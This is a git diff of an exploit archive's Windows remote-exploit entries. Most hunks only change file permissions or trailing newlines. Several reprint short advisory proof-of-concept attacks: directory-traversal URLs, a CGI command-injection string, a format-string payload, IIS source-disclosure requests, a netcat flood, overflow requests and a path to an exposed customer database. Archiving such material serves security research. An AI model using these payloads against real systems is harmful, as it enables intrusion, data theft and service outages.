susceptible to the "../" directory traversal vulnerability. By using the '../' string in a URL, an attacker can gain read access to files outside the intended web file structure. Example: -http ://xyz.com/../../../config.sys \ No newline at end of file +http ://xyz.com/../../../config.sys \ No newline at end of file diff --git a/platforms/windows/remote/19570.txt b/platforms/windows/remote/19570.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19580.txt b/platforms/windows/remote/19580.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19581.txt b/platforms/windows/remote/19581.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19584.c b/platforms/windows/remote/19584.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19586.c b/platforms/windows/remote/19586.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19587.txt b/platforms/windows/remote/19587.txt old mode 100755 new mode 100644 index 87b3eba01..568ccb3f8 --- a/platforms/windows/remote/19587.txt +++ b/platforms/windows/remote/19587.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/762/info Certain versions of the AN-HTTPd server contain default CGI scripts that allow code to be executed remotely. This is due to poor sanity checking on user supplied data. -http://www.xxx.yy/cgi-bin/input.bat?|dir..\..\windows \ No newline at end of file +http://www.xxx.yy/cgi-bin/input.bat?|dir..\..\windows \ No newline at end of file diff --git a/platforms/windows/remote/19588.c b/platforms/windows/remote/19588.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19589.txt b/platforms/windows/remote/19589.txt old mode 100755 new mode 100644 index 74fe36bf2..249138feb --- a/platforms/windows/remote/19589.txt +++ b/platforms/windows/remote/19589.txt @@ -15,4 +15,4 @@ blablabla . > 250 Mail accepted. -This will cause the mail server to create a root directory called "createdir", which will contain 1 file. Testing indicates that this method cannot be used to overwrite existing folders. \ No newline at end of file +This will cause the mail server to create a root directory called "createdir", which will contain 1 file. Testing indicates that this method cannot be used to overwrite existing folders. \ No newline at end of file diff --git a/platforms/windows/remote/19591.txt b/platforms/windows/remote/19591.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19592.asm b/platforms/windows/remote/19592.asm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19593.c b/platforms/windows/remote/19593.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19595.c b/platforms/windows/remote/19595.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19601.txt b/platforms/windows/remote/19601.txt old mode 100755 new mode 100644 index 5f4011e87..6fcc45f8d --- a/platforms/windows/remote/19601.txt +++ b/platforms/windows/remote/19601.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/773/info Etype's Eserv product is designed to be a one-source internet connectivity solution, incorporating mail, web, ftp, and proxy servers into one package. The web server will allow remote browsing of the entire filesystem by the usage of ../ strings in the URL. This gives an attacker read access to every file on the server's filesystem that the webserver has access to. -http://victim.com/../../../autoexec.bat \ No newline at end of file +http://victim.com/../../../autoexec.bat \ No newline at end of file diff --git a/platforms/windows/remote/19603.txt b/platforms/windows/remote/19603.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19607.c b/platforms/windows/remote/19607.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19608.c b/platforms/windows/remote/19608.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19611.txt b/platforms/windows/remote/19611.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19614.asm b/platforms/windows/remote/19614.asm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19617.txt b/platforms/windows/remote/19617.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19618.txt b/platforms/windows/remote/19618.txt old mode 100755 new mode 100644 index 00c54a707..75adf5b03 --- a/platforms/windows/remote/19618.txt +++ b/platforms/windows/remote/19618.txt @@ -24,4 +24,4 @@ alert("File exists"); <FORM> <INPUT TYPE="TEXT" VALUE="C:\AUTOEXEC.BAT" SIZE=60> <INPUT TYPE="SUBMIT" VALUE="Check file" onclick="checkfile()"> -</FORM> \ No newline at end of file +</FORM> \ No newline at end of file diff --git a/platforms/windows/remote/19621.c b/platforms/windows/remote/19621.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19622.c b/platforms/windows/remote/19622.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19623.c b/platforms/windows/remote/19623.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19637.txt b/platforms/windows/remote/19637.txt old mode 100755 new mode 100644 index ae85d5df7..765f408e2 --- a/platforms/windows/remote/19637.txt +++ b/platforms/windows/remote/19637.txt @@ -21,4 +21,4 @@ normal):<BR>"+s); a.document.close(); } setTimeout("f()",5000); -</SCRIPT> \ No newline at end of file +</SCRIPT> \ No newline at end of file diff --git a/platforms/windows/remote/1965.pm b/platforms/windows/remote/1965.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19662.txt b/platforms/windows/remote/19662.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19679.txt b/platforms/windows/remote/19679.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19688.txt b/platforms/windows/remote/19688.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19689.c b/platforms/windows/remote/19689.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19719.txt b/platforms/windows/remote/19719.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19724.txt b/platforms/windows/remote/19724.txt old mode 100755 new mode 100644 index b0f1874fb..7184cc2fa --- a/platforms/windows/remote/19724.txt +++ b/platforms/windows/remote/19724.txt @@ -4,4 +4,4 @@ ICQ is an individual to individual chat network which has clients installed on m Sending the following URL (with no line breaks) in a regular message to a user will cause their ICQ to crash (just a basic proof of concept, no real malicious exploit code included here) if they click on it: -http://www.yahoo.com/sites.asp?^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð ^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^ Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð ^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^ Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð ^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^ Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð ^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^ Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð ^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^ Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð ^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð!!!!·P !^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð \ No newline at end of file +http://www.yahoo.com/sites.asp?^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð ^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^ Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð ^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^ Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð ^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^ Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð ^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^ Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð ^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^ Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð ^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð!!!!·P !^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð \ No newline at end of file diff --git a/platforms/windows/remote/19730.c b/platforms/windows/remote/19730.c old mode 100755 new mode 100644 index 6f1718afb..3295d066a --- a/platforms/windows/remote/19730.c +++ b/platforms/windows/remote/19730.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/949/info InetServ is a freeware mail server for 32 bit Windows systems. @@ -7,6 +8,7 @@ One of the features of this program is webmail, which allows mail to be read fro There are also many other unchecked buffers in the code, each of which could potentially be exploited in this manner. It should be noted that the webmail interface is an optional feature of A-V Tronics InetServ, and is not enabled by default. +*/ #include "windows.h" #include "stdio.h" diff --git a/platforms/windows/remote/19731.c b/platforms/windows/remote/19731.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19734.java b/platforms/windows/remote/19734.java old mode 100755 new mode 100644 index 444c41f7c..ea2b3f453 --- a/platforms/windows/remote/19734.java +++ b/platforms/windows/remote/19734.java @@ -50,4 +50,4 @@ outputArea.setText(e.toString()); } } } -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/remote/19737.c b/platforms/windows/remote/19737.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19738.txt b/platforms/windows/remote/19738.txt old mode 100755 new mode 100644 index 6a96ba7e1..b0df45acc --- a/platforms/windows/remote/19738.txt +++ b/platforms/windows/remote/19738.txt @@ -6,4 +6,4 @@ Example code: <SCRIPT> a=window.open("about:<A HREF='javascript:alert(x.body.innerText)' >Click here to see the active message</A>"); a.x=window.document; -</SCRIPT> \ No newline at end of file +</SCRIPT> \ No newline at end of file diff --git a/platforms/windows/remote/19743.txt b/platforms/windows/remote/19743.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19753.txt b/platforms/windows/remote/19753.txt old mode 100755 new mode 100644 index 262ace9b0..1a48aaf6d --- a/platforms/windows/remote/19753.txt +++ b/platforms/windows/remote/19753.txt @@ -4,4 +4,4 @@ Microsoft's Personal Web Server and Front Page Personal Web Server will follow ' Note that while these programs support Windows 95, 98 and NT, only the Win9x versions are vulnerable. -http://target/..../directory/filename.ext \ No newline at end of file +http://target/..../directory/filename.ext \ No newline at end of file diff --git a/platforms/windows/remote/19761.txt b/platforms/windows/remote/19761.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19805.txt b/platforms/windows/remote/19805.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19809.txt b/platforms/windows/remote/19809.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19815.txt b/platforms/windows/remote/19815.txt old mode 100755 new mode 100644 index 840aede1f..c5107e608 --- a/platforms/windows/remote/19815.txt +++ b/platforms/windows/remote/19815.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/1067/info Some versions of vqSoft vqServer for Windows are vulnerable to the common ../../ method of retrieving known files from outside of the web directory structure, accomplished by appending a variable number of "../" and a known filename to an HTTP GET request. -http://target/../../../../../autoexec.bat \ No newline at end of file +http://target/../../../../../autoexec.bat \ No newline at end of file diff --git a/platforms/windows/remote/19819.txt b/platforms/windows/remote/19819.txt old mode 100755 new mode 100644 index bb3fe723e..891c512f7 --- a/platforms/windows/remote/19819.txt +++ b/platforms/windows/remote/19819.txt @@ -11,4 +11,4 @@ In command line mode, all delivery options are specified at the command line as In header parsing mode, a file is specified with the -n switch that contains a set of headers at the beginning of the file, separated from the message body by a single blank line. Therefore, if an attacker can create a file on the system that includes an 'Attach:' header, they can then specify that file with the -n switch and wait for the file listed in the 'Attach' header to arrive via email. To retrieve any known ascii file from the target webserver, enter a URL like: -http: //target/cgi-bin/windmail.exe?%20-n%20desired.file%20attacker_email_address \ No newline at end of file +http: //target/cgi-bin/windmail.exe?%20-n%20desired.file%20attacker_email_address \ No newline at end of file diff --git a/platforms/windows/remote/19830.txt b/platforms/windows/remote/19830.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19846.pl b/platforms/windows/remote/19846.pl index 5ffaaf570..3504e9b97 100755 --- a/platforms/windows/remote/19846.pl +++ b/platforms/windows/remote/19846.pl @@ -6,4 +6,4 @@ The dvwssr.dll included with the FrontPage 98 extensions for IIS and shipped as #!/usr/bin/perl print "GET /_vti_bin/_vti_aut/dvwssr.dll?"; print "a" x 5000; -print " HTTP/1.1\nHost: yourhost\n\n"; \ No newline at end of file +print " HTTP/1.1\nHost: yourhost\n\n"; \ No newline at end of file diff --git a/platforms/windows/remote/19871.txt b/platforms/windows/remote/19871.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19877.txt b/platforms/windows/remote/19877.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19881.txt b/platforms/windows/remote/19881.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19889.c b/platforms/windows/remote/19889.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19893.c b/platforms/windows/remote/19893.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19895.txt b/platforms/windows/remote/19895.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19897.txt b/platforms/windows/remote/19897.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19908.txt b/platforms/windows/remote/19908.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19914.txt b/platforms/windows/remote/19914.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19928.txt b/platforms/windows/remote/19928.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/19939.html b/platforms/windows/remote/19939.html old mode 100755 new mode 100644 index cc2b48fa5..82eae262b --- a/platforms/windows/remote/19939.html +++ b/platforms/windows/remote/19939.html @@ -24,4 +24,4 @@ clientContent.navigate("c:\\known_file.txt") <form action="/cgi/malicious-script.cgi" method=post onSubmit="window.alert(document.forms[0].elements[0].value); return true"> <input name="file_text" type=hidden> -</form> \ No newline at end of file +</form> \ No newline at end of file diff --git a/platforms/windows/remote/19942.txt b/platforms/windows/remote/19942.txt old mode 100755 new mode 100644 index 335edd92d..ae3dbee5d --- a/platforms/windows/remote/19942.txt +++ b/platforms/windows/remote/19942.txt @@ -5,4 +5,4 @@ By default, Fortech Proxy+ can be remotely administered by any user possessing n In addition, the telnet gateway is open by default which can accomodate for anonymous packet forwarding. To remotely administer Proxy+ (given that the default port has not been changed): -http://target:4400/admin \ No newline at end of file +http://target:4400/admin \ No newline at end of file diff --git a/platforms/windows/remote/19957.txt b/platforms/windows/remote/19957.txt old mode 100755 new mode 100644 index 41b8a0c8f..d48250872 --- a/platforms/windows/remote/19957.txt +++ b/platforms/windows/remote/19957.txt @@ -6,4 +6,4 @@ First, a user may create a duplicate of a known file in a known directory on the This vulnerability depends on the anonymous internet account having write access to the relevant directories. -http://target/scripts/Carello/add.exe?C:\directory\filename.ext \ No newline at end of file +http://target/scripts/Carello/add.exe?C:\directory\filename.ext \ No newline at end of file diff --git a/platforms/windows/remote/19973.txt b/platforms/windows/remote/19973.txt old mode 100755 new mode 100644 index f23acfffb..87a454963 --- a/platforms/windows/remote/19973.txt +++ b/platforms/windows/remote/19973.txt @@ -8,4 +8,4 @@ Directory traversal vulnerability: http:&nbsp;//target/../../knowndirectory/ Path disclosure vulnerability: -http:&nbsp;//target/../<very long character string> \ No newline at end of file +http:&nbsp;//target/../<very long character string> \ No newline at end of file diff --git a/platforms/windows/remote/19976.txt b/platforms/windows/remote/19976.txt old mode 100755 new mode 100644 index 7774d3b15..0caba324d --- a/platforms/windows/remote/19976.txt +++ b/platforms/windows/remote/19976.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/1286/info Sending an email to a Concatus IMate Web Mail Server 2.5 with a server name consisting of over 1119 characters will cause the application to crash. Restarting the program is required in order to regain normal functionality. Telnet target 25 -HELO <String of 1119 characters or more> \ No newline at end of file +HELO <String of 1119 characters or more> \ No newline at end of file diff --git a/platforms/windows/remote/19997.java b/platforms/windows/remote/19997.java old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/2.c b/platforms/windows/remote/2.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20.txt b/platforms/windows/remote/20.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20019.txt b/platforms/windows/remote/20019.txt old mode 100755 new mode 100644 index 19ca0645e..7539fe970 --- a/platforms/windows/remote/20019.txt +++ b/platforms/windows/remote/20019.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/1358/info By appending the string "/expdate" to a request for the cart32.exe executable, (http:&nbsp;//target/cgi-bin/cart32.exe/expdate) an attacker can access an error message followed by a debugging page containing the server variables, the Cart32 administration directory and possibly the contents of the cgi-bin. -http:&nbsp;//target/cgi-bin/cart32.exe/expdate \ No newline at end of file +http:&nbsp;//target/cgi-bin/cart32.exe/expdate \ No newline at end of file diff --git a/platforms/windows/remote/20040.c b/platforms/windows/remote/20040.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20048.txt b/platforms/windows/remote/20048.txt old mode 100755 new mode 100644 index fa9ab72b9..fc5cf4636 --- a/platforms/windows/remote/20048.txt +++ b/platforms/windows/remote/20048.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/1415/info Sending a stream of binary zeros to any one of a number of Windows 2000 ports can cause 100% CPU utilization. The ports that were found vulnerable include TCP ports 7, 9, 21, 23, 7778 and UDP ports 53, 67, 68, 135, 137, 500, 1812, 1813, 2535, 3456. -This can easily be reproduced from a Linux system using netcat with an input of /dev/zero, with a command such as "nc target.host 7 < /dev/zero" for the TCP variant or "nc -u target.host 53 < /dev/zero" for the UDP variant. \ No newline at end of file +This can easily be reproduced from a Linux system using netcat with an input of /dev/zero, with a command such as "nc target.host 7 < /dev/zero" for the TCP variant or "nc -u target.host 53 < /dev/zero" for the UDP variant. \ No newline at end of file diff --git a/platforms/windows/remote/20065.txt b/platforms/windows/remote/20065.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20066.java b/platforms/windows/remote/20066.java old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20070.txt b/platforms/windows/remote/20070.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20074.java b/platforms/windows/remote/20074.java old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20079.txt b/platforms/windows/remote/20079.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20086.c b/platforms/windows/remote/20086.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20089.txt b/platforms/windows/remote/20089.txt old mode 100755 new mode 100644 index c5a472b11..d6a5a9f0c --- a/platforms/windows/remote/20089.txt +++ b/platforms/windows/remote/20089.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/1488/info Microsoft IIS 4.0 and 5.0 can be made to disclose fragments of source code which should otherwise be inaccessible. This is done by appending "+.htr" to a request for a known .asp (or .asa, .ini, etc) file. Appending this string causes the request to be handled by ISM.DLL, which then strips the +.htr string and may disclose part or all of the source of the .asp file specified in the request. There has been a report that source will be displayed up to the first '<%' encountered - '<%' and '%>' are server-side script delimiters. Pages which use the <script runat=server></script> delimiters instead will display the entire source, or up to any '<%' in the page. This vulnerability is a variant of a previously discovered vulnerability, BugTraq ID 1193. -http://victim/global.asa+.htr \ No newline at end of file +http://victim/global.asa+.htr \ No newline at end of file diff --git a/platforms/windows/remote/20096.txt b/platforms/windows/remote/20096.txt old mode 100755 new mode 100644 index 53723597b..7679300f2 --- a/platforms/windows/remote/20096.txt +++ b/platforms/windows/remote/20096.txt @@ -16,4 +16,4 @@ HEAD /directory HTTP/1.0[CRLF] HTTP/1.1 401 Access Denied WWW-Authenticate: Basic realm="<Internal IP Address>" Content-Length: 644 -Content-Type: text/html \ No newline at end of file +Content-Type: text/html \ No newline at end of file diff --git a/platforms/windows/remote/20103.txt b/platforms/windows/remote/20103.txt old mode 100755 new mode 100644 index ac37fe372..3b8b769cf --- a/platforms/windows/remote/20103.txt +++ b/platforms/windows/remote/20103.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/1508/info Requesting a specially formed url containing encoding (%2E) to SimpleServer 1.06 and possibley earlier versions, will enable a remote user to gain read access to known files above the SimpleServer directory. -http://target/%2E%2E/filename \ No newline at end of file +http://target/%2E%2E/filename \ No newline at end of file diff --git a/platforms/windows/remote/20106.cpp b/platforms/windows/remote/20106.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20125.txt b/platforms/windows/remote/20125.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20135.txt b/platforms/windows/remote/20135.txt old mode 100755 new mode 100644 index 55da82bbc..e3d8e158b --- a/platforms/windows/remote/20135.txt +++ b/platforms/windows/remote/20135.txt @@ -6,4 +6,4 @@ The problem in particular is a failure on behalf of the web server to enforce a By default the enrollment server uses \Program Files\Network Associates\Net Tools PKI Server\WebServer\enroll-server as the Web Root directory. In a properly written webserver a user should only be able to move forward in the tree not backward. -https://host:444/..\..\..\..\..\autoexec.bat \ No newline at end of file +https://host:444/..\..\..\..\..\autoexec.bat \ No newline at end of file diff --git a/platforms/windows/remote/20136.txt b/platforms/windows/remote/20136.txt old mode 100755 new mode 100644 index ab1100205..408e5b0d5 --- a/platforms/windows/remote/20136.txt +++ b/platforms/windows/remote/20136.txt @@ -6,4 +6,4 @@ Certain versions of Network Associates Inc.'s Net Tools PKI (Public Key Infrastr https://host:444/xxx%3c%b9%ff%01%25%25x%25%25x%25%25x%25%25x%25%25x%25\ %25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25\ %25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25\ %25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25\ %25x%25%25x%25x%25n.xuda -note: the string has been wrapped for readability. \ No newline at end of file +note: the string has been wrapped for readability. \ No newline at end of file diff --git a/platforms/windows/remote/20180.c b/platforms/windows/remote/20180.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20182.txt b/platforms/windows/remote/20182.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20184.txt b/platforms/windows/remote/20184.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20211.c b/platforms/windows/remote/20211.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20222.cpp b/platforms/windows/remote/20222.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20223.txt b/platforms/windows/remote/20223.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20224.txt b/platforms/windows/remote/20224.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20240.txt b/platforms/windows/remote/20240.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20243.html b/platforms/windows/remote/20243.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/20247.txt b/platforms/windows/remote/20247.txt old mode 100755 new mode 100644 index 313011bf5..eb7486044 --- a/platforms/windows/remote/20247.txt +++ b/platforms/windows/remote/20247.txt @@ -4,4 +4,4 @@ Smartwin Technology CyberOffice Shopping Cart is a shopping cart application for The order form CyberOffice Shopping Cart utilizes can be easily modified by downloading the form locally and then resubmitting it to the target server containing the new values. Unit item prices can be modified to any arbitrary value. -<input type="hidden" name="Item" value="Specified Value"> \ No newline at end of file +<input type="hidden" name="Item" value="Specified Value"> \ No newline at end of file diff --git a/platforms/windows/remote/20248.txt b/platforms/windows/remote/20248.txt old mode 100755 new mode 100644 index 16f11a67f..5ffaee835 --- a/platforms/windows/remote/20248.txt +++ b/platforms/windows/remote/20248.txt @@ -4,4 +4,4 @@ Smartwin Technology CyberOffice Shopping Cart is a shopping cart application for It is possible for a remote user to gain read access to the _private directory on a website running CyberOffice Shopping Cart 2.0. By default the _private directory has world readable permissions. The Microsoft Access Database which contains confidential client details (such as customer orders and unencrypted credit card information) is stored in the _private directory and is thus accessible to attackers. An attacker need only request "http://target/_private/shopping_cart.mdb" with a browser to access it. 